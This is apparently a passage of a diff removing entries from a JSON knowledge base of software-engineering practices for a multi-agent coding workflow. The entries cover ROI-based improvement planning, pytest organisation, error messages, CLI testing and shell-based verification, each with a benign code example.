dimension: testability improvements = highest ROI when missing (7-point gain, low implementation cost), security fixes = medium ROI (moderate gain, high criticality), documentation = lowest ROI for code quality scores (2-point gain, deferred to later subtask). Target 'low-hanging fruit' first to reach 8.0+ approval threshold faster. Pattern proven: Subtask 6 iteration 1 → 2: adding tests (testability 3→9, +6 points) achieved 2.0-point overall score improvement (6.75→8.75, 30% increase) with single iteration. 
Avoid optimizing dimensions already at 8+ (diminishing returns) or dimensions handled by future subtasks (wasted effort). ROI prioritization reduces iteration count: 2 iterations with ROI focus vs 4+ iterations with unfocused improvements.", - "code_example": "```python\n# ✅ GOOD - ROI Prioritization\nclass ImprovementPlanner:\n def prioritize(self, scores, threshold=8.0):\n improvements = []\n for dim, score in scores.items():\n if score >= threshold:\n continue\n gap = threshold - score\n cost = self.COST[dim] # low/medium/high\n roi = gap / cost\n improvements.append((dim, roi))\n return sorted(improvements, key=lambda x: x[1], reverse=True)\n\n# Example: testability roi=5.0 → highest priority\n# Result: +6 points, overall +2.0 (30% increase), 1 iteration\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:48:26.144410Z", - "last_used_at": "2025-10-27T11:48:26.144410Z", - "related_bullets": [ - "arch-0012", - "impl-0087" - ], - "tags": [ - "iterative-refinement", - "ROI", - "optimization", - "Evaluator", - "improvement", - "prioritization" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "perf-docs-optimization", - "content": "Documentation Workflow Token Optimization: For true documentation changes (markdown files, agent templates, README updates - NOT code comments near logic), use MAP Efficient workflow to skip per-subtask Monitor/Predictor validation and batch Evaluator/Reflector/Curator at end. Achieves 35% token savings (97K vs 150K) with 0 error rate for documentation-only changes. CRITICAL: Only apply to documentation changes that don't affect code behavior. Code comments near logic require full validation. 
Evidence: Sequential Thinking Integration added 782 lines using MAP Efficient, 0 errors, 53K tokens saved.", - "code_example": "```bash\nchanged_files=$(git diff --name-only HEAD)\nif echo \"$changed_files\" | grep -qE '\\.(py|js|go)$'; then\n workflow=\"/map-feature\" # Code changes\nelif echo \"$changed_files\" | grep -qE '\\.(md|\\.claude/)$'; then\n workflow=\"/map-efficient\" # Docs only (35% savings)\nfi\n```", - "related_to": [ - "perf-0024" - ], - "tags": [ - "token-optimization", - "workflow-selection", - "documentation", - "map-framework" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143923" - } - ] - }, - "ERROR_PATTERNS": { - "description": "Common errors, their root causes, and proven solutions", - "bullets": [ - { - "id": "err-0001", - "content": "Educational Error Messages with Contrast Examples: When validation fails, provide educational context with 5+ valid examples AND 5+ invalid examples with explanations. Developers learn by contrast - showing BOTH what works (✅) and what fails (❌) with reasons builds mental models faster than rejection alone. Include: (1) What input was invalid, (2) Expected format specification, (3) Valid examples (✅), (4) Invalid examples with specific reasons (❌ leading zero, ❌ missing component), (5) Actionable fix (which file to update, what format to use). 
Pattern prevents repeated trial-and-error.", - "code_example": "```python\n# ❌ BAD - rejection without guidance\nif not valid:\n print(\"Invalid version format\")\n sys.exit(1)\n\n# ✅ GOOD - educational with contrast examples\nif not re.match(semver_pattern, version):\n print(f\"\\n❌ ERROR: Invalid version format: {version}\")\n print(\"\\nExpected format: X.Y.Z (Semantic Versioning 2.0.0)\")\n print(\"\\nValid examples:\")\n print(\" ✅ 0.1.0\")\n print(\" ✅ 1.0.0\")\n print(\" ✅ 2.10.15\")\n print(\"\\nInvalid examples:\")\n print(\" ❌ 01.0.0 (leading zero in major)\")\n print(\" ❌ v1.0.0 (version prefix not allowed)\")\n print(\" ❌ 1.0 (incomplete, missing patch)\")\n print(\" ❌ 1.0.0-alpha (pre-release not supported)\")\n print(\" ❌ 1.0.0.0 (too many components)\")\n print(\"\\nFix: Update version in pyproject.toml to valid semver\")\n sys.exit(1)\n```", - "tags": [ - "error-handling", - "user-experience", - "validation", - "education", - "feedback" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:08:24.353122+00:00", - "last_used_at": "2025-10-26T08:08:24.353122+00:00", - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "TESTING_STRATEGIES": { - "description": "Test patterns, mocking approaches, and coverage strategies", - "bullets": [ - { - "id": "test-0001", - "content": "Iterative Refinement Based on Monitor Feedback: Treat Monitor/Evaluator feedback as acceptance criteria for test-driven development in multi-agent workflows. When Monitor identifies gaps (e.g., 'implementation plan missing'), treat this as a failing test. Refine Actor output iteratively until Monitor feedback shows all criteria met. This creates a feedback loop: Actor implements → Monitor evaluates → Actor refines → repeat until quality gates pass. 
Prevents shipping incomplete work in autonomous systems.", - "code_example": "```python\n# ✅ Monitor-Driven Refinement Loop\ndef execute_with_refinement(task, max_iterations=3):\n for iteration in range(max_iterations):\n # Actor executes\n result = actor.execute(task)\n \n # Monitor evaluates (like pytest)\n feedback = monitor.evaluate(result)\n \n if feedback.all_criteria_met:\n return result # Test passed\n \n # Refine based on feedback (like fixing failing test)\n task.context.append({\n \"iteration\": iteration,\n \"gaps\": feedback.missing_criteria,\n \"instruction\": \"Address these gaps: \" + feedback.gaps\n })\n \n raise QualityGateError(f\"Failed to meet criteria after {max_iterations} iterations\")\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T12:26:06.880415Z", - "last_used_at": "2025-10-18T12:26:06.880415Z", - "related_bullets": [], - "tags": [ - "testing", - "monitor", - "feedback-loop", - "iterative", - "quality-gate", - "multi-agent", - "tdd" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0002", - "content": "Iteration Count as Learning Effectiveness Metric: Track iterations required per subtask to quantitatively validate learning mechanisms and specification quality. Expected pattern: First subtask establishes baseline iteration count, subsequent similar subtasks should require ≤1 iteration if learning is effective. Calculate learning efficiency: (first_subtask_iterations - current_subtask_iterations) / first_subtask_iterations. Example: Subtask 1 = 2 iterations baseline, Subtask 2 = 1 iteration → 50% efficiency gain. If later subtasks don't show improvement, learning mechanism is broken. 
Additionally, single-iteration completion indicates clear specification quality, while multi-iteration indicates specification ambiguity - use rejection reasons to identify missing details in specs.", - "code_example": "```python\n# ✅ Iteration Tracking for Learning Validation\nclass WorkflowMetrics:\n def __init__(self):\n self.subtask_iterations = {} # {subtask_id: iteration_count}\n \n def track_iteration(self, subtask_id, iteration_num):\n self.subtask_iterations[subtask_id] = iteration_num\n \n def calculate_learning_efficiency(self, baseline_subtask, current_subtask):\n baseline_iters = self.subtask_iterations[baseline_subtask]\n current_iters = self.subtask_iterations[current_subtask]\n \n efficiency = (baseline_iters - current_iters) / baseline_iters\n \n if efficiency < 0:\n raise LearningRegressionError(\n f\"Learning failed: {current_subtask} required MORE iterations \"\n f\"({current_iters}) than baseline ({baseline_iters})\"\n )\n \n return efficiency # 0.5 = 50% improvement\n\n# Usage in orchestrator\nmetrics = WorkflowMetrics()\nfor subtask in workflow.subtasks:\n iterations = execute_with_refinement(subtask)\n metrics.track_iteration(subtask.id, iterations)\n \n if subtask.id > 0: # Not first subtask\n efficiency = metrics.calculate_learning_efficiency(\n baseline_subtask=workflow.subtasks[0].id,\n current_subtask=subtask.id\n )\n logger.info(f\"Learning efficiency: {efficiency:.1%}\")\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T15:42:00.000000Z", - "last_used_at": "2025-10-18T15:42:00.000000Z", - "related_bullets": [ - "test-0001", - "impl-0002" - ], - "tags": [ - "testing", - "metrics", - "learning", - "iteration", - "quantitative", - "map-framework", - "python", - "validation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0003", - "content": "Over-Delivery Pattern Recognition: Track optimization over-delivery percentage as quality signal to identify safe vs harmful optimization 
zones. Calculate: actual_reduction / target_reduction * 100. Establish evidence-based thresholds: (1) 100-150% over target = optimal zone (praised in workflow), (2) 150-200% over = caution zone (review needed), (3) >200% over = danger zone (quality concerns raised). Use over-delivery metric to calibrate optimization aggressiveness: praised optimizations establish safe upper bound, concerning optimizations establish danger threshold. Pattern enables quantitative optimization validation: 'Monitor 135% praised' + 'Evaluator 238% concerns' → safe threshold between 135-238%, likely ~150-180% depending on template purpose (validation vs teaching).", - "code_example": "```python\n# ✅ Over-Delivery Tracking and Threshold Validation\nclass OptimizationMetrics:\n # Evidence-based thresholds from workflow analysis\n THRESHOLDS = {\n \"optimal_zone\": (1.0, 1.5), # 100-150% over target\n \"caution_zone\": (1.5, 2.0), # 150-200% over target \n \"danger_zone\": (2.0, float('inf')) # >200% over target\n }\n \n @staticmethod\n def calculate_over_delivery(target: float, actual: float) -> float:\n \"\"\"Returns over-delivery ratio (e.g., 1.35 = 135% of target)\"\"\"\n return actual / target\n \n @staticmethod\n def assess_quality(over_delivery: float, template_purpose: str) -> dict:\n \"\"\"Assess optimization quality based on over-delivery\"\"\"\n if over_delivery < 1.0:\n return {\"zone\": \"under_target\", \"action\": \"increase_optimization\"}\n elif over_delivery <= 1.5:\n return {\"zone\": \"optimal\", \"action\": \"approved\", \n \"evidence\": \"Monitor 135% praised\"}\n elif over_delivery <= 2.0:\n return {\"zone\": \"caution\", \"action\": \"review_required\",\n \"risk\": \"approaching_danger_threshold\"}\n else:\n return {\"zone\": \"danger\", \"action\": \"reject\",\n \"evidence\": \"Evaluator 238% raised concerns\"}\n\n# Usage in optimization workflow:\ntarget_reduction = 0.50 # 50% target\nactual_reduction = 0.67 # 67% achieved\nover_delivery = 
OptimizationMetrics.calculate_over_delivery(\n target_reduction, actual_reduction\n) # Returns 1.34 (134%)\n\nassessment = OptimizationMetrics.assess_quality(over_delivery, \"validation\")\nprint(f\"Zone: {assessment['zone']}, Action: {assessment['action']}\")\n# Output: Zone: optimal, Action: approved\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T18:00:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "test-0002", - "impl-0004" - ], - "tags": [ - "testing", - "optimization", - "metrics", - "over-delivery", - "quality-signal", - "thresholds", - "quantitative", - "map-framework", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0004", - "content": "Template Directory Cleanup Verification Pattern: When maintaining template directories that should contain only canonical content, proactively scan for and remove artifact files created by editors, backup tools, or interrupted operations. Common patterns to clean: .backup, .old, .tmp, .swp, ~ (tilde backups). Perform cleanup as a separate step from content synchronization (separation of concerns). Verify artifacts are truly disposable before removal - check they match disposable patterns and aren't user-created content files. Clean directories before hash-based verification to prevent polluted checksums requiring re-verification. 
Always verify cleanup succeeded using pattern matching.", - "code_example": "```bash\n# ❌ INCORRECT - delete without verification\nrm -f src/templates/**/*.backup\n\n# ✅ CORRECT - verify artifacts before removal\nfind src/templates -type f \\( \\\n -name '*.backup' -o \\\n -name '*.old' -o \\\n -name '*.tmp' -o \\\n -name '*.swp' -o \\\n -name '*~' \\) -delete\n\n# Verify cleanup succeeded\nfind src/templates -type f | grep -E '\\.(backup|old|tmp|swp)|~$' || echo \"Clean\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T10:00:56.751830Z", - "last_used_at": "2025-10-20T10:00:56.751831Z", - "related_bullets": [ - "test-0001" - ], - "tags": [ - "cleanup", - "verification", - "template", - "artifacts", - "testing", - "devops", - "bash", - "find", - "pattern-matching" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0005", - "content": "Exploratory Testing Documentation Pattern: For behavioral investigation tasks, deliver both executable tests AND structured markdown documentation to serve dual audiences (technical + business). Executable tests (pytest) provide automated regression prevention and technical proof. Markdown documentation (behavior matrices) provides business stakeholder visibility and decision-making context. Organize tests by system state (e.g., 'incomplete plan', 'no plan', 'multiple plans') not by API commands - this mirrors user mental models and business scenarios. State-based organization scales better than command-based (N states vs M*N command-state combinations). 
Pattern proven in exploratory API testing workflows.", - "code_example": "```python\n# ❌ POOR - organized by API commands (doesn't scale)\ndef test_get_plan():\n pass\n\ndef test_create_plan():\n pass\n\ndef test_delete_plan():\n pass\n\n# ✅ GOOD - organized by system states\ndef test_behavior_with_no_plan_exists():\n \"\"\"When user has no plan, GET returns empty, CREATE succeeds\"\"\"\n api.delete_all_plans(user_id)\n assert api.get_plan(user_id) == None\n assert api.create_plan(user_id, data).success == True\n\ndef test_behavior_with_incomplete_plan_exists():\n \"\"\"When incomplete plan exists, GET returns it, CREATE replaces\"\"\"\n api.create_plan(user_id, {\"partial\": True})\n existing = api.get_plan(user_id)\n assert existing.complete == False\n new_plan = api.create_plan(user_id, {\"complete\": True})\n assert api.get_plan(user_id).id == new_plan.id # Replaced\n\ndef test_behavior_with_complete_plan_exists():\n \"\"\"When complete plan exists, GET returns it, CREATE fails with conflict\"\"\"\n api.create_plan(user_id, {\"complete\": True})\n with pytest.raises(ConflictError):\n api.create_plan(user_id, {\"other\": True})\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "test-0001", - "impl-0001" - ], - "tags": [ - "testing", - "exploratory", - "pytest", - "documentation", - "behavior", - "state-based", - "python", - "regression" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0006", - "content": "Pytest Fixture Composition Pattern: Build complex test scenarios from simple reusable fixtures using composition not monolithic fixtures. Create atomic fixtures for basic states (user, empty_plan, incomplete_plan, complete_plan), then compose them in test functions. This enables combinatorial testing (N fixtures → 2^N scenarios) without fixture explosion. 
Use pytest's dependency injection to automatically set up state chains. Pattern reduces fixture maintenance burden: change atomic fixture once, all compositions inherit the fix. Prefer function-scoped fixtures for test isolation unless explicit state sharing needed.", - "code_example": "```python\n# ❌ POOR - monolithic fixtures (doesn't compose)\n@pytest.fixture\ndef user_with_incomplete_plan():\n user = create_user()\n plan = create_plan(user.id, complete=False)\n return user, plan\n\n@pytest.fixture\ndef user_with_complete_plan():\n user = create_user()\n plan = create_plan(user.id, complete=True)\n return user, plan\n\n# ✅ GOOD - composable atomic fixtures\n@pytest.fixture\ndef user():\n \"\"\"Atomic fixture: user with no plans\"\"\"\n u = create_user()\n yield u\n cleanup_user(u.id)\n\n@pytest.fixture\ndef incomplete_plan(user):\n \"\"\"Atomic fixture: incomplete plan (depends on user)\"\"\"\n plan = create_plan(user.id, complete=False)\n yield plan\n cleanup_plan(plan.id)\n\n@pytest.fixture\ndef complete_plan(user):\n \"\"\"Atomic fixture: complete plan (depends on user)\"\"\"\n plan = create_plan(user.id, complete=True)\n yield plan\n cleanup_plan(plan.id)\n\n# Tests compose fixtures as needed\ndef test_scenario_with_incomplete_plan(user, incomplete_plan):\n \"\"\"Pytest injects user + incomplete_plan automatically\"\"\"\n assert get_plan(user.id).id == incomplete_plan.id\n\ndef test_scenario_with_complete_plan(user, complete_plan):\n \"\"\"Different composition, same atomic fixtures\"\"\"\n assert get_plan(user.id).complete == True\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "test-0001" - ], - "tags": [ - "pytest", - "fixtures", - "composition", - "testing", - "python", - "reusable", - "atomic", - "dependency-injection" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0007", - "content": "Bug 
Documentation as Tests: When discovering bugs during exploratory testing, document them as tests using pytest.raises or pytest.mark.xfail to keep bugs visible and reproducible until fixed. This creates executable bug tracker: failing test documents expected behavior, pytest.raises documents known broken behavior. Once bug is fixed, convert pytest.raises to assertion. Pattern prevents bug amnesia (verbal reports forgotten) and provides regression test automatically. Use descriptive test names as bug titles. Include bug ID in test docstring if using issue tracker. Prefer pytest.raises over pytest.mark.xfail when failure mode is known (specific exception type).", - "code_example": "```python\n# ❌ POOR - bug reported verbally/Slack, forgotten\n# \"Hey, DELETE fails when plan has nested objects\"\n\n# ✅ GOOD - bug documented as test\ndef test_delete_plan_with_nested_objects_raises_500():\n \"\"\"\n BUG: DELETE /plans/{id} returns 500 when plan has nested objects.\n Expected: 204 No Content (cascade delete)\n Actual: 500 Internal Server Error\n Issue: #1234\n \"\"\"\n plan = create_plan(user_id, {\"nested\": {\"data\": True}})\n \n # Document known broken behavior\n with pytest.raises(InternalServerError):\n api.delete_plan(plan.id)\n \n # After bug fix, replace with:\n # response = api.delete_plan(plan.id)\n # assert response.status_code == 204\n\n# Alternative: use xfail for less specific failure\n@pytest.mark.xfail(reason=\"Bug #1234: DELETE fails with nested objects\")\ndef test_delete_plan_with_nested_objects():\n plan = create_plan(user_id, {\"nested\": {\"data\": True}})\n response = api.delete_plan(plan.id)\n assert response.status_code == 204\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "test-0001", - "test-0004" - ], - "tags": [ - "pytest", - "bug-tracking", - "testing", - "documentation", - "pytest.raises", - "xfail", - "regression", - 
"python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0008", - "content": "Comprehensive Edge Case Testing with State-Based Organization: When fixing bugs or adding defensive features, write comprehensive test suites covering ALL edge cases organized by system state, not by operations. Structure: Group tests by preconditions (e.g., 'no plan exists', 'incomplete plan', 'complete plan', 'multiple plans'), then test all operations within each state. This ensures complete coverage matrix: N states × M operations = comprehensive test suite. Pattern proven: 28 tests organized by state caught 2 bugs (update crash, silent overwrite) and validated all fixes. State-based organization mirrors user mental models better than operation-based grouping. Include tests for: (1) Expected behavior, (2) Known bugs (with pytest.raises), (3) Force/safety flags, (4) Error messages content.", - "code_example": "```python\n# ❌ POOR - operation-based organization (incomplete coverage)\nclass TestCreatePlan:\n def test_create_plan(self): # Only happy path\n plan = manager.create_plan('feat1', 'goal', subtasks)\n assert plan.task_id == 'feat1'\n\nclass TestUpdatePlan:\n def test_update_plan(self): # Missing edge cases\n manager.update_subtask_status(1, 'completed')\n\n# ✅ GOOD - state-based organization (comprehensive)\nclass TestBehaviorWithNoPlanExists:\n \"\"\"Test all operations when no plan exists (precondition: empty state)\"\"\"\n \n def test_get_context_returns_no_plan_message(self, manager):\n result = manager.get_context()\n assert \"No active plan\" in result\n \n def test_update_raises_clear_error(self, manager):\n with pytest.raises(ValueError, match=\"No active plan exists. 
Create a plan first\"):\n manager.update_subtask_status(1, 'completed')\n \n def test_create_succeeds(self, manager, sample_subtasks):\n plan = manager.create_plan('feat1', 'goal', sample_subtasks)\n assert plan.task_id == 'feat1'\n\nclass TestBehaviorWithIncompletePlanExists:\n \"\"\"Test all operations when incomplete plan exists\"\"\"\n \n def test_get_context_shows_progress(self, manager_with_plan):\n result = manager_with_plan.get_context()\n assert \"0/2 subtasks completed\" in result\n \n def test_update_works_correctly(self, manager_with_plan):\n manager_with_plan.update_subtask_status(1, 'completed')\n plan = manager_with_plan._load_plan()\n assert plan.subtasks[0].status == 'completed'\n \n def test_create_without_force_raises_error(self, manager_with_plan, sample_subtasks):\n with pytest.raises(ValueError, match=\"A plan already exists.*--force\"):\n manager_with_plan.create_plan('feat2', 'new', sample_subtasks)\n \n def test_create_with_force_overwrites(self, manager_with_plan, sample_subtasks):\n new_plan = manager_with_plan.create_plan('feat2', 'new', sample_subtasks, force=True)\n assert new_plan.task_id == 'feat2'\n\nclass TestForceFlagBehavior:\n \"\"\"Test force flag specifically (safety mechanism)\"\"\"\n \n def test_force_prevents_accidental_overwrite(self, manager_with_plan):\n # Validates the intentional breaking change\n with pytest.raises(ValueError):\n manager_with_plan.create_plan('new', 'goal', [])\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T14:45:00.000000Z", - "last_used_at": "2025-10-20T14:45:00.000000Z", - "related_bullets": [ - "test-0005", - "test-0006", - "impl-0008" - ], - "tags": [ - "testing", - "pytest", - "edge-cases", - "state-based", - "comprehensive", - "defensive", - "python", - "coverage" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0009", - "content": "Command-Based Arithmetic Verification: NEVER trust mental arithmetic for numeric claims in 
documentation or analysis. ALWAYS verify counts, percentages, and calculations with shell commands (grep -c, wc -l, bc) BEFORE recording claims. Include verification commands inline for reproducibility and audit trails. Pattern prevents embarrassing arithmetic errors in deliverables (claiming 56 facts when actual is 55, claiming 90.3% when actual is 88.7%). Commands provide proof and enable automated validation. Mental arithmetic error rate: ~15% for multi-step calculations. Shell verification error rate: ~0% (deterministic).", - "code_example": "```bash\n# ❌ INCORRECT - mental arithmetic (error-prone)\necho \"File has 56 facts (90.3% of 62 total)\" >> report.txt\n# Risk: Arithmetic errors slip into deliverables\n\n# ✅ CORRECT - verify with shell commands\n# Count facts\nfact_count=$(grep -c '\\*\\*Fact:' verified_facts_workflow.txt)\necho \"Facts: $fact_count\" # Output: 55 (NOT 56!)\n\n# Count total lines for context\ntotal_lines=$(wc -l < verified_facts_workflow.txt)\necho \"Total lines: $total_lines\" # Output: 588\n\n# Calculate percentage with bc (floating point)\npercentage=$(echo \"scale=1; $fact_count / 62 * 100\" | bc)\necho \"Percentage: $percentage%\" # Output: 88.7% (NOT 90.3%!)\n\n# Record VERIFIED claims with proof\ncat >> report.txt << EOF\n**Verified Metrics:**\n- Facts: $fact_count (verified: grep -c '\\*\\*Fact:' verified_facts_workflow.txt)\n- Total lines: $total_lines (verified: wc -l)\n- Percentage: $percentage% (verified: echo \"scale=1; $fact_count/62*100\" | bc)\nEOF\n\n# Audit trail: anyone can re-run commands to verify\n```", - "tags": [ - "arithmetic", - "verification", - "bash", - "grep", - "bc", - "wc", - "accuracy", - "documentation", - "audit", - "testing" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014424Z", - "related_bullets": [ - "impl-0009", - "test-0004" - ], - "last_used_at": "2025-10-21T09:01:00.000000Z" - }, - { - "id": "test-0010", - "content": "SCOPE-Aware Validation Pattern: When 
validating outputs from tasks with explicit source constraints (e.g., 'Use ONLY verified_facts.txt'), validation MUST check compliance against the designated source file, NOT against implementation code or external references. Validation target = constraint target. For SCOPE constraints, validate boundary compliance FIRST (is content from allowed source?), factual accuracy SECOND (is content correct per that source?). Pattern: Task says 'Use ONLY file X' → Validator reads file X → Checks output matches file X, regardless of whether file X matches code/reality. This separates constraint compliance from content accuracy.", - "code_example": "```python\n# Task: Create presentation using ONLY verified_facts.txt\n# Slide claims: \"System has 5 MCP tools\" (from verified_facts.txt line 42)\n\n# ❌ INCORRECT - Validate against code\ndef validate_slide(slide_content):\n # Check actual codebase\n actual_tools = count_mcp_tools_in_code() # Returns 3\n if \"5 MCP tools\" in slide_content and actual_tools != 5:\n return ValidationError(\"Slide claims 5 tools but code has 3\")\n# Problem: Validates factual accuracy, ignores SCOPE constraint\n\n# ✅ CORRECT - Validate against designated source\ndef validate_slide_scope_aware(slide_content, designated_source):\n # Step 1: SCOPE validation (boundary compliance)\n source_content = read_file(designated_source) # verified_facts.txt\n source_claims = extract_claims(source_content) # \"5 MCP tools\" at line 42\n \n for claim in extract_claims(slide_content):\n if claim not in source_claims:\n return ValidationError(\n f\"Claim '{claim}' not found in designated source {designated_source}. 
\"\n f\"SCOPE constraint violated.\"\n )\n \n # Step 2: Factual validation (optional, separate concern)\n # Only validate if task requires code accuracy, not just source compliance\n if task.requires_code_accuracy:\n actual_tools = count_mcp_tools_in_code()\n # Report discrepancy but don't fail SCOPE validation\n if actual_tools != 5:\n warnings.append(f\"Source file claims 5 tools but code has {actual_tools}\")\n \n return ValidationSuccess()\n\n# Key: SCOPE constraint compliance (does slide match source?) is PRIMARY\n# Factual accuracy (does source match code?) is SECONDARY\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-21T11:18:48.871189Z", - "last_used_at": "2025-10-21T14:46:01.752282Z", - "related_bullets": [ - "impl-0013", - "impl-0014" - ], - "tags": [ - "validation", - "scope-constraint", - "boundary-compliance", - "monitor", - "testing", - "source-verification", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0015", - "content": "3-Layer Testing for CLI Tools (Typer/Click): CLI tools distributed via pip require testing at 3 distinct layers to catch integration gaps. Layer 1: Unit tests for core logic (business logic, algorithms, validation rules) - traditional pytest, 54+ tests proven effective. Layer 2: CLI integration tests using CliRunner (Typer's test harness) - verify command parsing, flag handling, exit codes, stdout/stderr output. Layer 3: E2E tests with installed package (subprocess.run after pip install) - verify CLI accessible to users, test matrix across install methods (editable install, uv tool install, standard pip install). Missing Layer 2/3 creates risk: core logic works (Layer 1 passes) but CLI flags parse incorrectly, exit codes wrong, or command not accessible post-install. 
Pattern proven: validate-dependencies.py had 54 unit tests (Layer 1) but missing Layer 2 CliRunner tests exposed integration gaps during manual testing.", - "code_example": "```python\n# Layer 1: Unit Tests (Core Logic)\nimport pytest\nfrom mapify_cli.tools.validate_dependencies import DependencyValidator\n\ndef test_validator_detects_missing_dependencies():\n \"\"\"Test core validation logic without CLI\"\"\"\n validator = DependencyValidator()\n result = validator.validate_imports('sample.py')\n assert 'pytest' in result.missing_deps\n\n# Layer 2: CLI Integration Tests (CliRunner)\nfrom typer.testing import CliRunner\nfrom mapify_cli.main import app # Typer app\n\nrunner = CliRunner()\n\ndef test_cli_validate_deps_command():\n \"\"\"Test CLI command parsing and output via CliRunner\"\"\"\n result = runner.invoke(app, ['validate-deps', '--help'])\n assert result.exit_code == 0\n assert 'Validate dependencies' in result.stdout\n\ndef test_cli_validate_deps_with_missing():\n \"\"\"Test CLI exit codes and error reporting\"\"\"\n result = runner.invoke(app, ['validate-deps', 'tests/fixtures/missing_deps.py'])\n assert result.exit_code == 1 # Error exit code\n assert 'Missing dependencies' in result.stdout\n\n# Layer 3: E2E Tests (Installed Package)\nimport subprocess\nimport sys\n\ndef test_cli_accessible_after_install():\n \"\"\"Test CLI accessible to pip install users\"\"\"\n # Assumes package installed in current environment\n result = subprocess.run(\n [sys.executable, '-m', 'mapify_cli', 'validate-deps', '--help'],\n capture_output=True,\n text=True\n )\n assert result.returncode == 0\n assert 'Validate dependencies' in result.stdout\n\n@pytest.mark.parametrize('install_method', [\n 'pip install -e .', # Editable\n 'uv tool install .', # UV tool\n 'pip install mapify-cli' # Standard\n])\ndef test_cli_works_across_install_methods(install_method, tmp_venv):\n \"\"\"Test matrix: verify CLI accessible via all install methods\"\"\"\n subprocess.run(install_method, 
shell=True, cwd=tmp_venv, check=True)\n result = subprocess.run(\n f'{tmp_venv}/bin/mapify validate-deps --version',\n shell=True,\n capture_output=True\n )\n assert result.returncode == 0\n```", - "helpful_count": 7, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892107Z", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0016", - "content": "Automation Format Validation with Target Tool Patterns: Before committing structured files consumed by automation scripts (CHANGELOG.md, package.json, pyproject.toml), validate format using SAME extraction patterns that automation uses. Pattern: CHANGELOG.md consumed by bump-version.sh using 'sed -n /## \\\\[1.0.0\\\\]/,/## \\\\[/p' → Before committing, test extraction with identical sed/grep commands → Verify output matches expectations. This prevents silent automation failures where file parses correctly for humans but breaks automation regex. Predictor role ideal for this validation - simulates automation environment before deployment.", - "code_example": "```bash\n# CHANGELOG.md automation validation example\n# bump-version.sh uses this pattern to extract release notes:\n# sed -n \"/## \\\\[$VERSION\\\\]/,/## \\\\[/p\" CHANGELOG.md | head -n -1\n\n# ✅ VALIDATION TEST - run BEFORE committing CHANGELOG.md\nVERSION=\"1.0.0\"\n\n# Test extraction pattern (same command automation uses)\nRELEASE_NOTES=$(sed -n \"/## \\\\[$VERSION\\\\]/,/## \\\\[/p\" CHANGELOG.md | head -n -1)\n\necho \"Extracted release notes:\"\necho \"$RELEASE_NOTES\"\n\n# Validate extraction succeeded\nif [ -z \"$RELEASE_NOTES\" ]; then\n echo \"❌ VALIDATION FAILED: sed extraction returned empty (automation will fail)\"\n echo \"Check CHANGELOG.md format: ## [$VERSION] header must exist\"\n exit 1\nfi\n\n# Validate format expectations\nif ! 
echo \"$RELEASE_NOTES\" | grep -q \"## \\\\[$VERSION\\\\]\"; then\n echo \"❌ VALIDATION FAILED: version header missing in extraction\"\n exit 1\nfi\n\necho \"✅ VALIDATION PASSED: CHANGELOG.md format compatible with bump-version.sh automation\"\n```", - "tags": [ - "automation", - "validation", - "changelog", - "sed", - "grep", - "predictor", - "map-framework", - "ci-cd" - ], - "related_bullets": [ - "impl-0027", - "test-0002" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-25T21:15:57.637760+00:00", - "last_used_at": "2025-10-25T21:15:57.637760+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0026", - "content": "Investigation Scope Checklist for CLI Command Issues: When debugging CLI command failures, use comprehensive first-iteration search checklist to avoid incomplete investigations requiring multiple rounds. Checklist: (1) **Definition Location** - grep for @app.command('command-name') decorator to find implementation, (2) **Function Signature** - inspect parameters, types, defaults (typer.Argument vs typer.Option), (3) **Registration Points** - search for app.add_typer() calls in main CLI, check sub-app integration, (4) **Documentation References** - grep command name in docs/ (USAGE.md, README.md, ARCHITECTURE.md), (5) **Test Coverage** - search test files for command name usage examples, (6) **CLI Entry Points** - check pyproject.toml [project.scripts] for command registration. Pattern proven: systematic multi-location search in first iteration prevents 'found definition but missed docs' or 'found docs but missed tests' gaps. 
